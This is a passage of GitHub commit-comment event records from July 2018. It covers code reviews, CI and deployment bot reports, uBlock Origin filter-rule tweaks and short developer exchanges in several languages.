{"id":"7908923885","type":"CommitCommentEvent","actor":{"login":"micahjohnson150"},"repo":{"name":"USDA-ARS-NWRC/smrf"},"payload":{"comment":{"id":29572133,"position":null,"line":null,"path":null,"commit_id":"841fd9634d7ab83e4d285fefa7ef9ba36391af77","created_at":"2018-07-02T21:01:56Z","updated_at":"2018-07-02T21:01:56Z","author_association":"CONTRIBUTOR","body":"Unittests was chosen as our test framework. This resolves our test framework discussion (closes #19 )"}},"created_at":"2018-07-02T21:01:56Z"}
{"id":"7908925699","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29572143,"position":null,"line":null,"path":null,"commit_id":"365d46d5d492da70ba627dd5fa568a1b012cec0c","created_at":"2018-07-02T21:02:23Z","updated_at":"2018-07-02T21:02:23Z","author_association":"OWNER","body":"Automatic build report for commit 365d46d5d492da70ba627dd5fa568a1b012cec0c:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-9.95-brightgreen.svg)](#)\n"}},"created_at":"2018-07-02T21:02:23Z"}
{"id":"7908930783","type":"CommitCommentEvent","actor":{"login":"were"},"repo":{"name":"dmlc/tvm"},"payload":{"comment":{"id":29572156,"position":null,"line":null,"path":null,"commit_id":"206e4ae402fa84d03bfe806f5d603d667cb35f8d","created_at":"2018-07-02T21:03:30Z","updated_at":"2018-07-02T21:03:30Z","author_association":"CONTRIBUTOR","body":"What is this for?"}},"created_at":"2018-07-02T21:03:30Z"}
{"id":"7908932509","type":"CommitCommentEvent","actor":{"login":"zardam"},"repo":{"name":"zardam/epsilon"},"payload":{"comment":{"id":29572165,"position":237,"line":385,"path":"escher/src/text_area.cpp","commit_id":"0b61aaa6a29775c1ef0e3c675c0705776f26965f","created_at":"2018-07-02T21:03:53Z","updated_at":"2018-07-02T21:03:53Z","author_association":"OWNER","body":"The lexer strips the string delimiters in lex->vstr.len, so if you have a triple quoted string (by triple quoted, I mean something like this : \"\"\"hello\"\"\"), the useful length is lex->vstr.len + 6 (and lex->vstr.len + 2 for a \"normal\" string)\r\n\r\ntext[0] == text[1] means that the string is a triple quoted one, with single or double quotes (here, we know that text[0] is the delimiter because the lexer detected a MP_TOKEN_STRING)"}},"created_at":"2018-07-02T21:03:53Z"}
{"id":"7908936817","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572172,"position":19,"line":19,"path":"CSharpPT7/Program.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T21:04:52Z","updated_at":"2018-07-02T21:04:52Z","author_association":"OWNER","body":"Então, é que no C# você pode ter somente 1 método `static void Main(string[] args)` por projeto. Se eu jogar essa lógica direto no Main, ia ficar apagando o conteúdo a cada aula e o aluno perde o histórico quando baixar o projeto completo... Outra alternativa seria usar classes parciais. O modificador `partial` permite que você divida os membros de uma classe em vários arquivos diferentes. Dessa forma poderemos criar o arquivo \"TestaArray.cs\" com o método para testar array e poderemos chamar normalmente no \"Program.cs\""}},"created_at":"2018-07-02T21:04:52Z"}
{"id":"7908937701","type":"CommitCommentEvent","actor":{"login":"akimlyubchenko"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29572174,"position":20,"line":20,"path":"NET.S.2018.Lyubchenko.03/RootCalculator/RootCalculator.cs","commit_id":"2d2e0637469b8c8c90bfb2c69a98f424b9930cef","created_at":"2018-07-02T21:05:04Z","updated_at":"2018-07-02T21:05:04Z","author_association":"OWNER","body":"Исправил"}},"created_at":"2018-07-02T21:05:04Z"}
{"id":"7908938086","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572176,"position":10,"line":10,"path":"CSharpPT7/Program.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T21:05:10Z","updated_at":"2018-07-02T21:05:10Z","author_association":"OWNER","body":"Respondi no outro comentário."}},"created_at":"2018-07-02T21:05:10Z"}
{"id":"7908940548","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29572178,"position":null,"line":null,"path":null,"commit_id":"1883b2e383c6ca691950e516d140e05cdf001088","created_at":"2018-07-02T21:05:43Z","updated_at":"2018-07-02T21:05:43Z","author_association":"CONTRIBUTOR","body":"`rapidvideo.com##script:inject(abort-on-property-write.js, onload)`\r\nBreaks playback on sites who embed `rapidvideo`\r\n\r\nExample link:\r\n`https://otakustream.tv/anime/shakugan-no-shana/episode-11`\r\n\r\nI will change it to \r\n`rapidvideo.com##script:inject(set-constant.js, onload, noopFunc)`"}},"created_at":"2018-07-02T21:05:43Z"}
{"id":"7908941051","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572179,"position":40,"line":40,"path":"CSharpPT7/Program.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T21:05:49Z","updated_at":"2018-07-02T21:05:49Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-02T21:05:49Z"}
{"id":"7908941516","type":"CommitCommentEvent","actor":{"login":"uBlock-user"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29572182,"position":null,"line":null,"path":null,"commit_id":"1883b2e383c6ca691950e516d140e05cdf001088","created_at":"2018-07-02T21:05:56Z","updated_at":"2018-07-02T21:05:56Z","author_association":"MEMBER","body":"They updated it again by using window.onload for the video src..."}},"created_at":"2018-07-02T21:05:56Z"}
{"id":"7908942131","type":"CommitCommentEvent","actor":{"login":"micahjohnson150"},"repo":{"name":"USDA-ARS-NWRC/smrf"},"payload":{"comment":{"id":29572183,"position":null,"line":null,"path":null,"commit_id":"5435b2a1c4c96bcec7a475fb7d36b7859745d238","created_at":"2018-07-02T21:06:05Z","updated_at":"2018-07-02T21:06:05Z","author_association":"CONTRIBUTOR","body":"Fixes #36 "}},"created_at":"2018-07-02T21:06:05Z"}
{"id":"7908942471","type":"CommitCommentEvent","actor":{"login":"gyadesa"},"repo":{"name":"gyadesa/gyadesa.github.io"},"payload":{"comment":{"id":29572184,"position":null,"line":null,"path":null,"commit_id":"2ac064cf16e2f67c0f6e4fb992ac1f41e579effa","created_at":"2018-07-02T21:06:09Z","updated_at":"2018-07-02T21:06:09Z","author_association":"OWNER","body":"Pull request group project."}},"created_at":"2018-07-02T21:06:09Z"}
{"id":"7908943759","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572190,"position":168,"line":168,"path":"CSharpPT7/Program.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T21:06:27Z","updated_at":"2018-07-02T21:06:27Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-02T21:06:27Z"}
{"id":"7908945370","type":"CommitCommentEvent","actor":{"login":"Vladyslav317"},"repo":{"name":"Vladyslav317/welcome-to-github"},"payload":{"comment":{"id":29572193,"position":null,"line":null,"path":null,"commit_id":"b0ea0e1c52914a4d8cbc8a20335c0b0e0bf02d5c","created_at":"2018-07-02T21:06:50Z","updated_at":"2018-07-02T21:06:50Z","author_association":"OWNER","body":"Hello!"}},"created_at":"2018-07-02T21:06:50Z"}
{"id":"7908945557","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29572194,"position":null,"line":null,"path":null,"commit_id":"1ffc6774a6e2b6eac9e6cb030ae143d7bdff1f26","created_at":"2018-07-02T21:06:53Z","updated_at":"2018-07-02T21:06:53Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-serch](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-serch).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-serch-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-02T21:06:53Z"}
{"id":"7908946867","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"ncox2011/contact-list"},"payload":{"comment":{"id":29572197,"position":9,"line":16,"path":"src/scripts/Contact.js","commit_id":"a0352cc9190d251df90db074e598b412b4f2d8ca","created_at":"2018-07-02T21:07:10Z","updated_at":"2018-07-02T21:07:10Z","author_association":"NONE","body":"Here it is!"}},"created_at":"2018-07-02T21:07:10Z"}
{"id":"7908948293","type":"CommitCommentEvent","actor":{"login":"micahjohnson150"},"repo":{"name":"USDA-ARS-NWRC/smrf"},"payload":{"comment":{"id":29572198,"position":null,"line":null,"path":null,"commit_id":"841fd9634d7ab83e4d285fefa7ef9ba36391af77","created_at":"2018-07-02T21:07:28Z","updated_at":"2018-07-02T21:07:28Z","author_association":"CONTRIBUTOR","body":"Also fixes #1 "}},"created_at":"2018-07-02T21:07:28Z"}
{"id":"7908951267","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29572205,"position":null,"line":null,"path":null,"commit_id":"9007b443693287706f4ac437ac4be9931a4b1f84","created_at":"2018-07-02T21:08:08Z","updated_at":"2018-07-02T21:08:08Z","author_association":"COLLABORATOR","body":"Puzzle `1307-a0596409` discovered in   [`src/main/java/com/zerocracy/pm/Claims.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pm/Claims.java)   and submitted as #1317. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-02T21:08:08Z"}
{"id":"7908951757","type":"CommitCommentEvent","actor":{"login":"joviane"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572207,"position":19,"line":19,"path":"CSharpPT7/Program.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T21:08:14Z","updated_at":"2018-07-02T21:08:14Z","author_association":"NONE","body":"Gosto mais desta abordagem, assim não assusta o aluno com esta classe gigante... :D"}},"created_at":"2018-07-02T21:08:14Z"}
{"id":"7908957768","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ProdanSergey/social-network-react"},"payload":{"comment":{"id":29572218,"position":32,"line":125,"path":"server/controllers/server.controller.js","commit_id":"acd5d6bd3f35a15948c58c0e2954bb90d5b56ec1","created_at":"2018-07-02T21:09:39Z","updated_at":"2018-07-02T21:09:39Z","author_association":"NONE","body":"vrodedoshlo :)"}},"created_at":"2018-07-02T21:09:39Z"}
{"id":"7908961133","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29572224,"position":null,"line":null,"path":null,"commit_id":"16dfebbae822fb04ce00443d090cb3833aa81655","created_at":"2018-07-02T21:10:28Z","updated_at":"2018-07-02T21:10:28Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-666](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-666).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-666-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-02T21:10:28Z"}
{"id":"7908962872","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572227,"position":19,"line":19,"path":"CSharpPT7/Program.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T21:10:52Z","updated_at":"2018-07-02T21:10:52Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-02T21:10:52Z"}
{"id":"7908964420","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572229,"position":34,"line":34,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T21:11:14Z","updated_at":"2018-07-02T21:11:14Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-02T21:11:14Z"}
{"id":"7908964769","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29572231,"position":null,"line":null,"path":null,"commit_id":"51751ea2249a576fecd37098884d13c0aefa9af9","created_at":"2018-07-02T21:11:19Z","updated_at":"2018-07-02T21:11:19Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-MacOS-10.9-clang: OK (2930 of 2930 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-02T21:11:19Z"}
{"id":"7908965932","type":"CommitCommentEvent","actor":{"login":"yeltnar"},"repo":{"name":"yeltnar/ws-expose-server"},"payload":{"comment":{"id":29572233,"position":null,"line":null,"path":null,"commit_id":"d6a117b5aff9ef5a8ee826901267a544f4f65bbe","created_at":"2018-07-02T21:11:36Z","updated_at":"2018-07-02T21:11:36Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8839f9f8-ee5d-429f-8749-52267c653952?env_id=ibm%3Ayp%3Aus-south \"ws-expose\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5c41e84d-5968-4649-8c7b-52afb41b0a6e?env_id=ibm%3Ayp%3Aus-south \"ws-expose-pipeline\") deployed [ws-expose-server](https://github.com/yeltnar/ws-expose-server/releases/tag/deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180702-211135 \"deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180702-211135\") to [dev](https://console.bluemix.net/apps/e68f5516-a561-42c7-ac49-af54fea27ed3?env_id=ibm:yp:us-south \"ibm:yp:us-south:andcbrant@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-02T21:11:36Z"}
{"id":"7908968586","type":"CommitCommentEvent","actor":{"login":"micahjohnson150"},"repo":{"name":"USDA-ARS-NWRC/smrf"},"payload":{"comment":{"id":29572238,"position":null,"line":null,"path":null,"commit_id":"a203f85497cb05ff74c7ad6d5ed2a39f30240b45","created_at":"2018-07-02T21:12:14Z","updated_at":"2018-07-02T21:12:14Z","author_association":"CONTRIBUTOR","body":"fixes #52 "}},"created_at":"2018-07-02T21:12:14Z"}
{"id":"7908972353","type":"CommitCommentEvent","actor":{"login":"micahjohnson150"},"repo":{"name":"USDA-ARS-NWRC/smrf"},"payload":{"comment":{"id":29572243,"position":null,"line":null,"path":null,"commit_id":"3351437256998788bddebb64936133fc1182462e","created_at":"2018-07-02T21:13:08Z","updated_at":"2018-07-02T21:13:08Z","author_association":"CONTRIBUTOR","body":"fixes #70 "}},"created_at":"2018-07-02T21:13:08Z"}
{"id":"7908972357","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ProdanSergey/social-network-react"},"payload":{"comment":{"id":29572244,"position":6,"line":16,"path":"client/src/assets/fetchData.js","commit_id":"acd5d6bd3f35a15948c58c0e2954bb90d5b56ec1","created_at":"2018-07-02T21:13:08Z","updated_at":"2018-07-02T21:13:08Z","author_association":"NONE","body":"to my understanding it should be a kind of method utils which creates request obj,  utils.createRequest(method, url, data)"}},"created_at":"2018-07-02T21:13:08Z"}
{"id":"7908975844","type":"CommitCommentEvent","actor":{"login":"deadcoder0904"},"repo":{"name":"deadcoder0904/react-native-darkmode-list"},"payload":{"comment":{"id":29572256,"position":null,"line":null,"path":null,"commit_id":"18c54894ab2aa504acea2291e442689f781295f8","created_at":"2018-07-02T21:13:59Z","updated_at":"2018-07-02T21:13:59Z","author_association":"OWNER","body":"Ohh yeah it doesn't matter now. It works for now so if we have issues again, then we can post it on appropriate repos :)"}},"created_at":"2018-07-02T21:13:59Z"}
{"id":"7908978022","type":"CommitCommentEvent","actor":{"login":"AArnott"},"repo":{"name":"AArnott/vs-threading"},"payload":{"comment":{"id":29572259,"position":null,"line":null,"path":null,"commit_id":"357f279e44d150d2dbc305cf81fd549f2cbaed2d","created_at":"2018-07-02T21:14:30Z","updated_at":"2018-07-02T21:14:30Z","author_association":"OWNER","body":"I see this in the Visual Studio error list when the solution is open. I'm not sure I even have to build to get it to show up. If you check out this repo to the parent of this commit, I expect it will repro for you."}},"created_at":"2018-07-02T21:14:30Z"}
{"id":"7908978459","type":"CommitCommentEvent","actor":{"login":"jingzhaomirror"},"repo":{"name":"jingzhaomirror/Springboard-miniprojects"},"payload":{"comment":{"id":29572260,"position":null,"line":null,"path":null,"commit_id":"5be6af870be2deb3a08b6e92b234910dc61451f0","created_at":"2018-07-02T21:14:36Z","updated_at":"2018-07-02T21:14:36Z","author_association":"OWNER","body":"this notebook includes Q&A for JSON miniproject"}},"created_at":"2018-07-02T21:14:36Z"}
{"id":"7908979559","type":"CommitCommentEvent","actor":{"login":"dbellizzi"},"repo":{"name":"electrode-io/electrode-native-manifest"},"payload":{"comment":{"id":29572262,"position":6,"line":291,"path":"manifest.json","commit_id":"b2d81e90eb3e1f78043cee51073c0e03b083d151","created_at":"2018-07-02T21:14:53Z","updated_at":"2018-07-02T21:14:53Z","author_association":"NONE","body":"not sure if this matters, but the directory name is for version 0.26.10"}},"created_at":"2018-07-02T21:14:53Z"}
{"id":"7908981410","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ProdanSergey/social-network-react"},"payload":{"comment":{"id":29572268,"position":116,"line":82,"path":"client/src/components/Account.js","commit_id":"acd5d6bd3f35a15948c58c0e2954bb90d5b56ec1","created_at":"2018-07-02T21:15:18Z","updated_at":"2018-07-02T21:15:18Z","author_association":"NONE","body":"this is copy/paste should be a kind of HOC or your component <EditableAccountInput/>"}},"created_at":"2018-07-02T21:15:18Z"}
{"id":"7908981971","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29572270,"position":null,"line":null,"path":null,"commit_id":"c3f2f8dc1a46c3587026b1f4382fd657e425157a","created_at":"2018-07-02T21:15:27Z","updated_at":"2018-07-02T21:15:27Z","author_association":"COLLABORATOR","body":"Puzzle `292-732aceea` discovered in   [`lib/zold/commands/remote.rb`](  https://github.com/zold-io/zold/blob/master/lib/zold/commands/remote.rb)   and submitted as #328. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-02T21:15:27Z"}
{"id":"7908982279","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29572271,"position":null,"line":null,"path":null,"commit_id":"c3f2f8dc1a46c3587026b1f4382fd657e425157a","created_at":"2018-07-02T21:15:31Z","updated_at":"2018-07-02T21:15:31Z","author_association":"COLLABORATOR","body":"Puzzle `292-3bcf6540` discovered in   [`lib/zold/commands/remote.rb`](  https://github.com/zold-io/zold/blob/master/lib/zold/commands/remote.rb)   and submitted as #329. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-02T21:15:31Z"}
{"id":"7908983153","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29572274,"position":null,"line":null,"path":null,"commit_id":"ea1fcb49d6ce8f4381ee978cb3092b026bf5fb03","created_at":"2018-07-02T21:15:43Z","updated_at":"2018-07-02T21:15:43Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-child](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-child).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-child-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-02T21:15:43Z"}
{"id":"7908986063","type":"CommitCommentEvent","actor":{"login":"mikehardy"},"repo":{"name":"ACRA/acra"},"payload":{"comment":{"id":29572282,"position":null,"line":null,"path":null,"commit_id":"05e9a5384a981f905913b524f323108838154fe7","created_at":"2018-07-02T21:16:24Z","updated_at":"2018-07-02T21:16:24Z","author_association":"NONE","body":"I have no idea how to avoid the persistent toast unfortunately.. At least the required settings to cause it is very rare and only. In developer settings "}},"created_at":"2018-07-02T21:16:24Z"}
{"id":"7908987448","type":"CommitCommentEvent","actor":{"login":"Andreamilagros"},"repo":{"name":"DDRS/ICC"},"payload":{"comment":{"id":29572287,"position":null,"line":null,"path":null,"commit_id":"24a503b553b03607190416bb0e168a6b161f04ad","created_at":"2018-07-02T21:16:43Z","updated_at":"2018-07-02T21:16:43Z","author_association":"COLLABORATOR","body":"Buen codigo"}},"created_at":"2018-07-02T21:16:43Z"}
{"id":"7908990259","type":"CommitCommentEvent","actor":{"login":"AArnott"},"repo":{"name":"AArnott/vs-threading"},"payload":{"comment":{"id":29572293,"position":null,"line":null,"path":null,"commit_id":"357f279e44d150d2dbc305cf81fd549f2cbaed2d","created_at":"2018-07-02T21:17:24Z","updated_at":"2018-07-02T21:17:24Z","author_association":"OWNER","body":"`nuget restore` on the project file doesn't produce the warning message anywhere in the detailed log. But opening in VS and opening a single source file brings it up in the error list many times:\r\n\r\n![image](https://user-images.githubusercontent.com/3548/42186749-a177fb08-7e02-11e8-895b-6b507de5e762.png)\r\n"}},"created_at":"2018-07-02T21:17:24Z"}
{"id":"7908992113","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ProdanSergey/social-network-react"},"payload":{"comment":{"id":29572297,"position":23,"line":23,"path":"client/src/views/Account_input.js","commit_id":"acd5d6bd3f35a15948c58c0e2954bb90d5b56ec1","created_at":"2018-07-02T21:17:52Z","updated_at":"2018-07-02T21:17:52Z","author_association":"NONE","body":"is this target value smth different from update method above? why do we have to use query selector in update method?"}},"created_at":"2018-07-02T21:17:52Z"}
{"id":"7908995715","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ProdanSergey/social-network-react"},"payload":{"comment":{"id":29572310,"position":25,"line":25,"path":"client/src/views/Account_input.js","commit_id":"acd5d6bd3f35a15948c58c0e2954bb90d5b56ec1","created_at":"2018-07-02T21:18:46Z","updated_at":"2018-07-02T21:18:46Z","author_association":"NONE","body":"calculated field name looks good +1"}},"created_at":"2018-07-02T21:18:46Z"}
{"id":"7908998344","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ProdanSergey/social-network-react"},"payload":{"comment":{"id":29572315,"position":38,"line":38,"path":"client/src/views/Account_input.js","commit_id":"acd5d6bd3f35a15948c58c0e2954bb90d5b56ec1","created_at":"2018-07-02T21:19:27Z","updated_at":"2018-07-02T21:19:27Z","author_association":"NONE","body":"destructurisation"}},"created_at":"2018-07-02T21:19:27Z"}
{"id":"7908998836","type":"CommitCommentEvent","actor":{"login":"minibrute2s"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29572317,"position":null,"line":null,"path":null,"commit_id":"4f7447f08104706c537e4fd119dfa4a0afa3b799","created_at":"2018-07-02T21:19:35Z","updated_at":"2018-07-02T21:19:35Z","author_association":"NONE","body":"What is the use of \"control_key\"? What it does?"}},"created_at":"2018-07-02T21:19:35Z"}
{"id":"7909007050","type":"CommitCommentEvent","actor":{"login":"GuilhermeMatheus"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt7"},"payload":{"comment":{"id":29572337,"position":61,"line":61,"path":"CSharpPT7/ListaDeContas.cs","commit_id":"4b6c3b869718ccd87bae87511af53d04debfa70b","created_at":"2018-07-02T21:21:35Z","updated_at":"2018-07-02T21:21:35Z","author_association":"OWNER","body":"Na verdade, me toquei agora, aumentar de 1 em 1 é problemático demais, porque a cada operação de `Add` vamos ter uma complexidade `O(n)`. De qualquer modo, qualquer número constante é problemático (vc acaba aumentando pouco ou muito, percentualmente). Nas minhas pesquisas de 10 minutos não encontrei um paper justificando o fator de 2x no lugar de 1.5x ou 3x, por exemplo, mas julgo e diria que 2x é um bom meio termo"}},"created_at":"2018-07-02T21:21:35Z"}
{"id":"7909007387","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ProdanSergey/social-network-react"},"payload":{"comment":{"id":29572339,"position":1,"line":1,"path":"client/src/views/Account_input.js","commit_id":"acd5d6bd3f35a15948c58c0e2954bb90d5b56ec1","created_at":"2018-07-02T21:21:39Z","updated_at":"2018-07-02T21:21:39Z","author_association":"NONE","body":"in general this component looks good"}},"created_at":"2018-07-02T21:21:39Z"}
{"id":"7909008647","type":"CommitCommentEvent","actor":{"login":"ProperVortex"},"repo":{"name":"ProperVortex/eggcrackv2"},"payload":{"comment":{"id":29572344,"position":null,"line":null,"path":null,"commit_id":"96b1a3e33fba9ff21f52a8eed1d1d3570f6b83c0","created_at":"2018-07-02T21:21:58Z","updated_at":"2018-07-02T21:21:58Z","author_association":"OWNER","body":"this was made as a joke thx"}},"created_at":"2018-07-02T21:21:58Z"}
{"id":"7909012690","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29572351,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-02T21:22:52Z","updated_at":"2018-07-02T21:22:52Z","author_association":"NONE","body":"I thought gl_FragDepth was available since GLSL 1.10 for desktop GL? So technically it could still work for GL 2.x?\r\n\r\nhttps://www.khronos.org/registry/OpenGL-Refpages/gl4/html/gl_FragDepth.xhtml"}},"created_at":"2018-07-02T21:22:52Z"}
{"id":"7909016386","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"ewlusky/Songlist"},"payload":{"comment":{"id":29572362,"position":20,"line":20,"path":"index.html","commit_id":"8b42315133bea248e8ffebb4011109515353ace1","created_at":"2018-07-02T21:23:47Z","updated_at":"2018-07-02T21:23:47Z","author_association":"NONE","body":"Cannot find songs.json!"}},"created_at":"2018-07-02T21:23:47Z"}
{"id":"7909016444","type":"CommitCommentEvent","actor":{"login":"spinafranci"},"repo":{"name":"strumet/strumet.github.io"},"payload":{"comment":{"id":29572363,"position":null,"line":null,"path":null,"commit_id":"7935b52c88967e4c493a3923d17a1fb2068365c4","created_at":"2018-07-02T21:23:48Z","updated_at":"2018-07-02T21:23:48Z","author_association":"CONTRIBUTOR","body":"Ho corretto, grazie! Prof continuo a non capire perche autocad 01 non sia giusto. Non si vedevano le scritte e ho corretto.. qual è il problema? "}},"created_at":"2018-07-02T21:23:48Z"}
{"id":"7909017489","type":"CommitCommentEvent","actor":{"login":"aleclarson"},"repo":{"name":"EOSIO/eosjs"},"payload":{"comment":{"id":29572366,"position":13,"line":97,"path":"src/write-api.js","commit_id":"3dbee2426626c1ebe8c8bd3fe585eb1362457aac","created_at":"2018-07-02T21:24:04Z","updated_at":"2018-07-02T21:24:04Z","author_association":"NONE","body":"`typeof Array.isArray` looks like a typo :)\r\n\r\nAs-is, the condition always passes."}},"created_at":"2018-07-02T21:24:04Z"}
{"id":"7909017717","type":"CommitCommentEvent","actor":{"login":"UJWAL614"},"repo":{"name":"UJWAL614/MVCSAMPLE"},"payload":{"comment":{"id":29572368,"position":null,"line":null,"path":null,"commit_id":"d8a0b0e89d07a153c2d3dbe1f557293275e07f14","created_at":"2018-07-02T21:24:07Z","updated_at":"2018-07-02T21:24:07Z","author_association":"OWNER","body":"- [ ] "}},"created_at":"2018-07-02T21:24:07Z"}
{"id":"7909019115","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/crowdin-maven-plugin"},"payload":{"comment":{"id":29572369,"position":403,"line":403,"path":"src/main/java/org/digitalmediaserver/crowdin/configuration/TranslationFileSet.java","commit_id":"ba4177f3419951ddb0796f305fa02cb28b13afe1","created_at":"2018-07-02T21:24:29Z","updated_at":"2018-07-02T21:24:29Z","author_association":"NONE","body":"Hum...i don't remember having seen some exclusions for NSH file like for the `!` character.\r\nFrom Anders NSIS lead developper:\r\n\r\n> There is no spec for the .nsh translation files. It's syntax is the same as other NSIS .nsh files. In short that is:\r\n> \r\n> - Line comments start with ; or #\r\n> - Block comments (like C) with /* and */\r\n> - Quotes around strings: One of \", ' or ` (Pick what you want but they have to be paired)\r\n> - Preprocessor instructions start with !\r\n> \r\n> NSIS v2 files are usually encoded in the codepage used by that language. NSIS v3 uses UTF-8 BOM. NSIS v3 also supports inserting Unicode codepoints (${U+1234} etc). NSIS v2 is not accepting new translations, only bugfixes.\r\n> \r\n> \r\n> Each string is used in a single place and plural form should follow the English translation. We expect most people to just take the latest English file and translate it: https://sourceforge.net/p/nsis/code/...es/English.nsh\r\n> \r\n> The comments/credits at the start is optional but we generally prefer the Windows language id and the authors name there. You can add a e-mail and/or website address there as well if you wish. If there is no author credits in the .nlf nor the .nsh then we 